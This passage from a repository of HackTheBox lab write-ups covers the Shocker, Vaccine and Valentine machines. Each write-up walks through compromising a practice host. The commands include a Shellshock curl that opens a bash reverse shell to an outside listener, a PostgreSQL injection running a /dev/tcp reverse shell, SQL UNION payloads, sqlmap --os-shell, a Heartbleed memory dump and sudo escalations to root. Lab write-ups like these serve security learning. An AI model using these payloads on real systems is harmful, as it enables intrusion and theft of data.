| credman : 162 | 163 | ... 164 | ``` 165 | 166 | The found credentials are `sandra:Password1234!`. -------------------------------------------------------------------------------- /Shield/pics/blog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/blog.png -------------------------------------------------------------------------------- /Shield/pics/error1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/error1.png -------------------------------------------------------------------------------- /Shield/pics/error2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/error2.png -------------------------------------------------------------------------------- /Shield/pics/metasploit_filled_options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/metasploit_filled_options.png -------------------------------------------------------------------------------- /Shield/pics/metasploit_options.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/metasploit_options.png -------------------------------------------------------------------------------- /Shield/pics/metasploit_run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/metasploit_run.png -------------------------------------------------------------------------------- /Shield/pics/metasploit_search.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/metasploit_search.png -------------------------------------------------------------------------------- /Shield/pics/system_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/system_shell.png -------------------------------------------------------------------------------- /Shield/pics/webserver.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/webserver.png -------------------------------------------------------------------------------- /Shield/pics/wordpress.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/wordpress.png -------------------------------------------------------------------------------- /Shield/pics/wp_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shield/pics/wp_login.png -------------------------------------------------------------------------------- /Shocker/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | 3 | # Shocker (Linux) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | rustscan --ulimit 5000 10.129.1.175 -- -sC -sV -o port_scan 9 | 10 | PORT STATE SERVICE REASON VERSION 11 | 80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) 12 | | http-methods: 13 | |_ Supported Methods: GET HEAD POST OPTIONS 14 | |_http-server-header: Apache/2.4.18 (Ubuntu) 15 | |_http-title: Site doesn't have a title (text/html). 16 | 2222/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 17 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 18 | ``` 19 | 20 | ### Examine Port 80 - Apache Server 21 | 22 | ![](pics/website.png) 23 | 24 | Accessing Port 80 via the browser, we only see a picture. Guess we have to enumerate the webserver and search for other directories using `gobuster`: 25 | 26 | ``` 27 | └──╼ $ gobuster dir -u "10.129.1.175" -w /usr/share/wordlists/dirb/big.txt 28 | =============================================================== 29 | Gobuster v3.0.1 30 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 31 | =============================================================== 32 | [+] Url: http://10.129.1.175 33 | [+] Threads: 10 34 | [+] Wordlist: /usr/share/wordlists/dirb/big.txt 35 | [+] Status codes: 200,204,301,302,307,401,403 36 | [+] User Agent: gobuster/3.0.1 37 | [+] Timeout: 10s 38 | =============================================================== 39 | 2021/01/19 08:47:59 Starting gobuster 40 | =============================================================== 41 | /.htaccess (Status: 403) 42 | /.htpasswd (Status: 403) 43 | /cgi-bin/ (Status: 403) 44 | /server-status (Status: 403) 45 | ``` 46 | 47 | Gobuster reveals two additional directories: `cgi-bin` and `server-status`. While server-status is rather not interesting, cgi-bin can lead to serious vulnerabilities such as ShellShock. 48 | 49 | ### Shellshock 50 | Shellshock is effectively a Remote Command Execution vulnerability in Bash that is caused by the fact that BASH (versions 1.0.3 - 4.3) incorrectly executes trailing commands when it imports a function definition stored in an environment variable: 51 | 52 | ``` 53 | env x= '() { :;}; echo vulnerable' bash -c "echo test" 54 | ``` 55 | 56 | Vulnerable versions of Bash interpret `x='() { :;};'` as a function definition for a function named x. The function body is simply `:` (colon), which is a Bash-builtin that does nothing and returns with exit code 0. While importing the function, it also executes the code following it - `echo vulnerable`. The overall output is 57 | 58 | ``` 59 | vulnerable 60 | test 61 | ``` 62 | 63 | ### Exploiting Shellshock 64 | 65 | As the machine is also called Shocker, I assume that this is the vulnerability that we should exploit. So let's see if we can find some vulnerable scripts in the directory. 66 | 67 | Those scripts are mostly written in bash, perl, python or have the cgi extension. We can use gobuster again to scan the directory! 68 | 69 | ``` 70 | gobuster dir -u "10.129.1.175/cgi-bin/" -w /usr/share/wordlists/dirb/common.txt -x sh,pl,cgi,py 71 | =============================================================== 72 | Gobuster v3.0.1 73 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 74 | =============================================================== 75 | [+] Url: http://10.129.1.175/cgi-bin/ 76 | [+] Threads: 10 77 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt 78 | [+] Status codes: 200,204,301,302,307,401,403 79 | [+] User Agent: gobuster/3.0.1 80 | [+] Extensions: cgi,sh,pl,py 81 | [+] Timeout: 10s 82 | =============================================================== 83 | 2021/01/19 09:13:54 Starting gobuster 84 | =============================================================== 85 | /user.sh (Status: 200) 86 | 87 | ``` 88 | 89 | If we access the file via the browser, it asks us to download the response of the script: 90 | 91 | ``` 92 | └──╼ $ cat user.sh 93 | Content-Type: text/plain 94 | 95 | Just an uptime test script 96 | 97 | 03:16:23 up 32 min, 0 users, load average: 0.19, 0.15, 0.09 98 | ``` 99 | 100 | The script apparently executes the command `uptime`. 101 | 102 | *When a webserver uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the reuqest to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request. Security documentation for the widely used Apache web server states "CGI scripts can ... be extremely dangerous if they are not carefully checked." and other methods of handling web server requests are often used* (https://github.com/opsxcq/exploit-CVE-2014-6271) 103 | 104 | ## Gaining an Initial Foothold 105 | 106 | To establish a reverse shell, we first set up our netcat listener and then execute following: 107 | 108 | ``` 109 | curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.26/4444 0>&1" http://10.129.1.175/cgi-bin/user.sh 110 | ``` 111 | 112 | This will exploit the Shellshock vulnerability and create a reverse shell for us. Of course this can also be done with Burp or some scripts or even modules from Metasploit. But I usually prefer to do it manually. 113 | 114 | ![](pics/reverse_shell.png) 115 | 116 | ## Privilege Escalation 117 | 118 | Checking the available commands that can be executed with sudo, we see that our current user shelly can execute perl with sudo privileges. 119 | ``` 120 | shelly@Shocker:/home/shelly$ sudo -l 121 | Matching Defaults entries for shelly on Shocker: 122 | env_reset, mail_badpass, 123 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 124 | 125 | User shelly may run the following commands on Shocker: 126 | (root) NOPASSWD: /usr/bin/perl 127 | ``` 128 | 129 | Now it's rather easy: 130 | 131 | ``` 132 | shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";' 133 | # id 134 | uid=0(root) gid=0(root) groups=0(root) 135 | ``` 136 | 137 | We are root! -------------------------------------------------------------------------------- /Shocker/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shocker/pics/logo.png -------------------------------------------------------------------------------- /Shocker/pics/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shocker/pics/reverse_shell.png -------------------------------------------------------------------------------- /Shocker/pics/website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Shocker/pics/website.png -------------------------------------------------------------------------------- /Vaccine/README.md: -------------------------------------------------------------------------------- 1 | # Starting Point - Vaccine 2 | 3 | ## Enumeration 4 | 5 | ``` 6 | rustscan 10.10.10.46 -- -sC -sV -o port_scan 7 | 8 | PORT STATE SERVICE REASON VERSION 9 | 21/tcp open ftp syn-ack vsftpd 3.0.3 10 | 22/tcp open ssh syn-ack OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0) 11 | 80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu)) 12 | | http-cookie-flags: 13 | | /: 14 | | PHPSESSID: 15 | |_ httponly flag not set 16 | | http-methods: 17 | |_ Supported Methods: GET HEAD POST OPTIONS 18 | |_http-server-header: Apache/2.4.41 (Ubuntu) 19 | |_http-title: MegaCorp Login 20 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 21 | ``` 22 | 23 | 24 | ### Examine Port 80 - Apache Server 25 | 26 | ![](pics/apache_server.png) 27 | 28 | Seems to be a login website. Using the credentials `admin:MEGACORP_4dm1n!!` of the previous challenge fails. So this is a dead end for now. 29 | 30 | Let's try to scan the server for other directories. For this, we can use a tool like `dirb`, `dirbuster` or `gobuster` 31 | 32 | ``` 33 | gobuster dir -u "http://10.10.10.46" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 34 | ``` 35 | 36 | While this is running, we can check out the open FTP port. 37 | 38 | 39 | ### Examine Port 21 - FTP 40 | 41 | In the previous challenge, we found some FTP credentials in the Filezilla configs that belonged to root. 42 | 43 | ``` 44 | ftpuser 45 | mc@F1l3ZilL4 46 | ``` 47 | 48 | ![](pics/ftp_login.png) 49 | 50 | And indeed! We can login. 51 | 52 | In there, we find a file called `backup.zip`. 53 | ``` 54 | -rw-r--r-- 1 0 0 2533 Feb 03 2020 backup.zip 55 | ``` 56 | Using the `GET` command we can download it to our local machine. Unfortunately, the zip file is password protected. 57 | 58 | However, we can try to bruteforce the password with `john`. 59 | Therefore, we first have to use the tool `zip2john`. It converts the zip file into a understandable format for john. 60 | 61 | ``` 62 | backup.zip:$pkzip2$2*2*1*0*8*24*3a41*5722*543fb..... 63 | ``` 64 | 65 | Afterwards, we can use `john` to crack the hash. 66 | 67 | ``` 68 | $ john backup_hash -w=/usr/share/wordlists/rockyou.txt 69 | Using default input encoding: UTF-8 70 | Loaded 1 password hash (PKZIP [32/64]) 71 | Press 'q' or Ctrl-C to abort, almost any other key for status 72 | 741852963 (backup.zip) 73 | 1g 0:00:00:00 DONE (2021-01-02 12:26) 50.00g/s 44800p/s 44800c/s 44800C/s michelle1..ilovegod 74 | Use the "--show" option to display all of the cracked passwords reliably 75 | Session completed 76 | ``` 77 | 78 | Success! The password for the zip is `741852963`. 79 | 80 | Unzipping the file, we receive two files: 81 | 82 | 1) index.php 83 | 2) style.css 84 | 85 | Opening the `index.php` file we see following: 86 | ```html 87 | 88 |

MegaCorp Login

89 | 90 | 91 | 92 | ``` 93 | That seems familiar, right? That's the login page on Port 80. 94 | Let's further investigate the file. 95 | 96 | ```php 97 | 106 | ``` 107 | The php code reveals the valid username (`admin`) and the md5 hash of the password (`2cb42f8734ea607eefed3b70af13bbd3`). So all that's left, is to crack the md5 hash. 108 | 109 | For such a task I usually use [crackstation](https://crackstation.net/). 110 | 111 | ![](pics/crackstation.png) 112 | 113 | There we have it! The password is `qwerty789` 114 | 115 | ## Further Examine Port 80 - Login Page 116 | 117 | Using the credentials `admin:qwerty789` we can successfully login and get access to the MegaCorp Car Catalogue (/dashboard.php). 118 | 119 | ![](pics/megacorp_car_catalogue.png) 120 | 121 | The dashboard contains information about several Cars. I'm assuming they are loaded from a database. Furthermore, the website only has a SEARCH functionality. Sourcecode, cookies etc did not reveal any interesting information. So what can you do with that SEARCH field? 122 | 123 | Searching for "ELIXIR" (one of the car names), changes the dashboard content, so that only Elixir is shown. If we search for "SPORTS" (one of the car types), the page stays empty. 124 | 125 | So my guess is that, once we hit that SEARCH button, an SQL query is sent to the database, to retrieve all results with the attribute `carname/car/name` set to our value. From an attacker's perspective, this can be vulnerable to SQL Injection if not implemented carefully. So let's try that. 126 | 127 | ![](pics/test_sqli.png) 128 | 129 | By inserting a single `'`character into the search field and pressing enter, we get following error message: `ERROR: unterminated quoted string at or near "'" LINE 1: Select * from cars where name ilike '%'%' ^`. So here we have the proof, that the search field is indeed vulnerable to SQL injection. Let's gain information about the database by following these steps: 130 | 131 | 1) Find out how many columns are in the `cars` table. 132 | 133 | By injecting `' ORDER BY 1--`, and increasing the number until we receive an error, tells us how many columns exist. In our case, we get the error with `' ORDER BY 6--`. Therefore, we know the `cars` table has 5 columns. 134 | 135 | 2) Gain information about the column types 136 | 137 | Now that we know how many columns there are, we can extract further information with the [SQL Injection UNION attack](https://portswigger.net/web-security/sql-injection/union-attacks). 138 | 139 | - `' UNION SELECT 'a', NULL, NULL, NULL, NULL --` : ERROR 140 | - `' UNION SELECT NULL, 'a', NULL, NULL, NULL --` : VALID 141 | - `' UNION SELECT NULL, NULL, 'a', NULL, NULL --` : VALID 142 | - `' UNION SELECT NULL, NULL, NULL, 'a', NULL --` : VALID 143 | - `' UNION SELECT NULL, NULL, NULL, NULL, 'a' --` : VALID 144 | 145 | From this, we know that we can extract valuable information in form of strings when modifying index 1-4 of the UNION query. 146 | 147 | 3) Extract valuable information (table names etc) 148 | 149 | Using the [Portswigger SQLI Cheatsheet](https://portswigger.net/web-security/sql-injection/cheat-sheet), we can retrieve a lot of information about the database system: 150 | 151 | - Version: `' UNION SELECT NULL, NULL, NULL , NULL, VERSION() --`: PostgreSQL 11.5 (Ubuntu 11.5-1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.1.0-9ubuntu2) 9.1.0, 64-bit 152 | - Table names: `' UNION SELECT NULL, table_schema, table_name, NULL, NULL FROM information_schema.tables --` 153 | 154 | 4) Executing Arbitrary Commands via SQL Injection in PostgreSQL 155 | 156 | According to [this article](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5), all versions of PostgreSQL from 9.3, are vulnerable to this kind of arbitrary command execution (CVE-2019-9193) 157 | ``` 158 | '; CREATE TABLE cmd_exec(cmd_output text); -- 159 | 160 | '; COPY cmd_exec FROM PROGRAM 'bash -c ''bash -i >& /dev/tcp/10.10.14.55/4444 0>&1'''; -- 161 | 162 | (if output is needed) 163 | '; SELECT * FROM cmd_exec; -- (make sure the column number is correct) 164 | ``` 165 | 166 | 5) PROFIT 167 | 168 | ![](pics/reverse_shell.png) 169 | 170 | We now have access to the server! 171 | 172 | Btw, this all could have also been done automatically by using `sqlmap`, but for the sake of learning: keep doing it manually! 173 | 174 | ``` 175 | $ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vmnafl0uct1r97s1k5bkpoiopg" --dump-all --tamper=space2comment 176 | 177 | and 178 | 179 | $ sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vmnafl0uct1r97s1k5bkpoiopg" --os-shell 180 | ``` 181 | 182 | ## Exploitation 183 | 184 | In the home directory of our current user (/var/lib/postgresql), we can find a file called `user.txt`. It contains the user flag for the machine: `139d3e5c3db18073d250ce0dccc43997`. 185 | Furthermore, the directory also contains the the `.ssh` directory, in which the private and public SSH key of the user are located. We can use them to stablize our current connection. 186 | 187 | ``` 188 | $ chmod 600 ssh_key (private one) 189 | 190 | $ ssh -i postgres_sshkey postgres@10.10.10.46 191 | ``` 192 | 193 | In the `/var/www/html` directory, we can also find the source code for the `dashboard.php`. Let's take a look at the vulnerable SQL query. 194 | 195 | ``` php 196 | $q = "Select * from cars where name ilike '%". $_REQUEST["search"] ."%'"; 197 | ``` 198 | 199 | So it's basically just appending our user input to the SQL query, which is, as seen, a very bad idea. There must be some security measurements in place, such as user-input validation. 200 | 201 | Furthermore, we can also see the credentials of our current user `postgres`: 202 | 203 | ```php 204 | $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); 205 | ``` 206 | 207 | Having that, we can now check the sudoers list to see if our current user can execute a binary with sudo privileges: 208 | 209 | ``` 210 | postgres@vaccine:/var/www/html$ sudo -l 211 | [sudo] password for postgres: 212 | Matching Defaults entries for postgres on vaccine: 213 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 214 | 215 | User postgres may run the following commands on vaccine: 216 | (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf 217 | ``` 218 | 219 | Indeed! We can execute `/bin/vi` on a specific file with sudo privileges. However, we can also start a shell from within `vi`and escape this restriction. 220 | 221 | We execute: 222 | ``` 223 | sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf 224 | ``` 225 | Once, we are in the file editor, we press ESC and type: 226 | 227 | ``` 228 | :!/bin/sh 229 | 230 | or 231 | 232 | :shell 233 | ``` 234 | 235 | Now we have full root access: 236 | 237 | ``` 238 | root@vaccine:/var/www/html# id 239 | uid=0(root) gid=0(root) groups=0(root) 240 | ``` 241 | 242 | The root.txt is: `dd6e058e814260bc70e9bbdef2715849` 243 | -------------------------------------------------------------------------------- /Vaccine/pics/apache_server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/apache_server.png -------------------------------------------------------------------------------- /Vaccine/pics/crackstation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/crackstation.png -------------------------------------------------------------------------------- /Vaccine/pics/ftp_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/ftp_login.png -------------------------------------------------------------------------------- /Vaccine/pics/megacorp_car_catalogue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/megacorp_car_catalogue.png -------------------------------------------------------------------------------- /Vaccine/pics/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/reverse_shell.png -------------------------------------------------------------------------------- /Vaccine/pics/test_sqli.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Vaccine/pics/test_sqli.png -------------------------------------------------------------------------------- /Valentine/README.md: -------------------------------------------------------------------------------- 1 | ![](pics/logo.png) 2 | 3 | # Valentine (Linux) 4 | 5 | ## Enumeration 6 | 7 | ``` 8 | rustscan --ulimit 5000 10.129.1.190 -- -sC -sV -o port_scan 9 | 10 | 11 | PORT STATE SERVICE REASON VERSION 12 | 22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) 13 | 80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu)) 14 | | http-methods: 15 | |_ Supported Methods: GET HEAD POST OPTIONS 16 | |_http-server-header: Apache/2.2.22 (Ubuntu) 17 | |_http-title: Site doesn't have a title (text/html). 18 | 443/tcp open ssl/http syn-ack Apache httpd 2.2.22 ((Ubuntu)) 19 | | http-methods: 20 | |_ Supported Methods: GET HEAD POST OPTIONS 21 | |_http-server-header: Apache/2.2.22 (Ubuntu) 22 | |_http-title: Site doesn't have a title (text/html). 23 | | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US 24 | | Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US 25 | ``` 26 | 27 | ### Examine Port 80 - Apache webserver 28 | 29 | ![](pics/apache80.png) 30 | 31 | ``` 32 | └──╼ $ gobuster dir -u 10.129.1.190 -w /usr/share/wordlists/dirb/common.txt 33 | =============================================================== 34 | Gobuster v3.0.1 35 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 36 | =============================================================== 37 | [+] Url: http://10.129.1.190 38 | [+] Threads: 10 39 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt 40 | [+] Status codes: 200,204,301,302,307,401,403 41 | [+] User Agent: gobuster/3.0.1 42 | [+] Timeout: 10s 43 | =============================================================== 44 | 2021/01/26 12:55:32 Starting gobuster 45 | =============================================================== 46 | /.hta (Status: 403) 47 | /.htaccess (Status: 403) 48 | /.htpasswd (Status: 403) 49 | /cgi-bin/ (Status: 403) 50 | /decode (Status: 200) 51 | /dev (Status: 301) 52 | /encode (Status: 200) 53 | /index (Status: 200) 54 | /index.php (Status: 200) 55 | /server-status (Status: 403) 56 | ``` 57 | 58 | Let's check out the found results one by one 59 | 60 | #### Check: /cgi-bin/ 61 | 62 | The typical vulnerability that comes with the exposed /cgi/bin directory, is Shellshock. It enables RCE and must therefore carefully investigated. 63 | 64 | However, it seems like no scripts are in there. At least I did not find them with any wordlist. 65 | 66 | ### Check: /decode & /encode 67 | 68 | ![](pics/decoder.png) 69 | 70 | Here, we see some kind of service, that offers "Secure Data Decryption". We also have an Encoder service at /encode 71 | 72 | ![](pics/encoder.png) 73 | 74 | ### Check: /dev 75 | 76 | The dev directory leaks two very interesting files. 77 | - hype_key: contains an apparently hex encoded string. When converting it to ascii, we can see it's a encrypted RSA private key. Probably for ssh. 78 | - notes.txt: 79 | ``` 80 | To do: 81 | 82 | 1) Coffee. 83 | 2) Research. 84 | 3) Fix decoder/encoder before going live. 85 | 4) Make sure encoding/decoding is only done client-side. 86 | 5) Don't use the decoder/encoder until any of this is done. 87 | 6) Find a better way to take notes. 88 | ``` 89 | So apparently the decoder and encoder services do have some issues. Let's investiate them further. If we get stuck, we can still try the way of bruteforcing the RSA key password. 90 | 91 | 92 | ## Investigating the Decoder and Encoder Service 93 | 94 | Testing the encoder, reveals that it's a simple base64 encoder. 95 | 96 | ``` 97 | Your input: 98 | test 99 | Your encoded input: 100 | dGVzdA== 101 | ``` 102 | 103 | Same counts for the decoder. It's able to decode base64: 104 | 105 | ``` 106 | Your input: 107 | dGVzdA== 108 | Your encoded input: 109 | test 110 | ``` 111 | 112 | So what could be the issue with this application? In the note it is stated `"Make sure encoding/decoding is only done client-side"`. Maybe we have some kind of "eval" on the backened that executes the `base64` command. If so, then we could insert a payload and force it to execute it. Let's try that. 113 | 114 | Unfortunately, that's not the case. Hmm... what else could the issue be? Why would the note say it should only be done client-side? While looking through the different directories without having any idea what I missed, I recognized the picture that we saw on the index.html page. It's a big red heart, which is the logo of a very well known software bug, the Heartbleed bug. 115 | 116 | 117 | *The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users. (https://heartbleed.com/#:~:text=The%20Heartbleed%20Bug%20is%20a,used%20to%20secure%20the%20Internet.)* 118 | 119 | If the data of encryption and decryption service is also executed server side, then we could leak previous requests to it, as they could still remain in the memory! Maybe it contains some valuable information. Let's try it! 120 | 121 | ## Gainining an Initial Foothold 122 | 123 | As there exist tons of already working scripts, we can simply use one of them e.g. [this one](https://gist.github.com/eelsivart/10174134). 124 | ``` 125 | └──╼ $ python2 heartbleed.py 10.129.1.190 -p 443 126 | 127 | defribulator v1.16 128 | A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160) 129 | 130 | ################################################################## 131 | Connecting to: 10.129.1.190:443, 1 times 132 | Sending Client Hello for TLSv1.0 133 | Received Server Hello for TLSv1.0 134 | 135 | WARNING: 10.129.1.190:443 returned more data than it should - server is vulnerable! 136 | Please wait... connection attempt 1 of 1 137 | ################################################################## 138 | 139 | .@....SC[...r....+..H...9... 140 | ....w.3....f... 141 | ...!.9.8.........5............... 142 | .........3.2.....E.D...../...A.................................I......... 143 | ........... 144 | ...................................#.......0.0.1/decode.php 145 | Content-Type: application/x-www-form-urlencoded 146 | Content-Length: 42 147 | 148 | $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==...r.i...u........yO 149 | ``` 150 | 151 | And indeed! It dumps memory of a previously requested decoding/encoding of another user! 152 | 153 | Let's decode it and see what the plaintext is: 154 | 155 | ``` 156 | echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d 157 | 158 | heartbleedbelievethehype 159 | ``` 160 | 161 | This looks like a password! As we have an encrypted rsa key, which was stored in `hype_key`, we can also now safely assume, that the username is probably `hype`. 162 | 163 | Using openssl + the obtained password, we can now decrypt the key. 164 | 165 | ``` 166 | openssl rsa -in encrpted_key -out hype_ssh_key 167 | ``` 168 | 169 | Afterwards we use it to connect to the server as user hype. 170 | 171 | ``` 172 | ssh -i hype_ssh_key hype@10.129.1.190 173 | 174 | hype@Valentine:~$ hostname && id 175 | Valentine 176 | uid=1000(hype) gid=1000(hype) groups=1000(hype),24(cdrom),30(dip),46(plugdev),124(sambashare) 177 | ``` 178 | 179 | ## Privilege Escalation 180 | 181 | Running linpeas, we see that root has an open tmux session located in `/.dev/dev_sess`. As our user has permissions to that file, we can simply attach to it with: 182 | 183 | ``` 184 | tmux -S /.dev/dev_sess 185 | ``` 186 | 187 | And we are root! 188 | ``` 189 | root@Valentine:/.devs# hostname && id 190 | Valentine 191 | uid=0(root) gid=0(root) groups=0(root) 192 | ``` -------------------------------------------------------------------------------- /Valentine/pics/apache80.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/apache80.png -------------------------------------------------------------------------------- /Valentine/pics/decoder.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/decoder.png -------------------------------------------------------------------------------- /Valentine/pics/dev.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/dev.png -------------------------------------------------------------------------------- /Valentine/pics/encoder.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/encoder.png -------------------------------------------------------------------------------- /Valentine/pics/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Valentine/pics/logo.png --------------------------------------------------------------------------------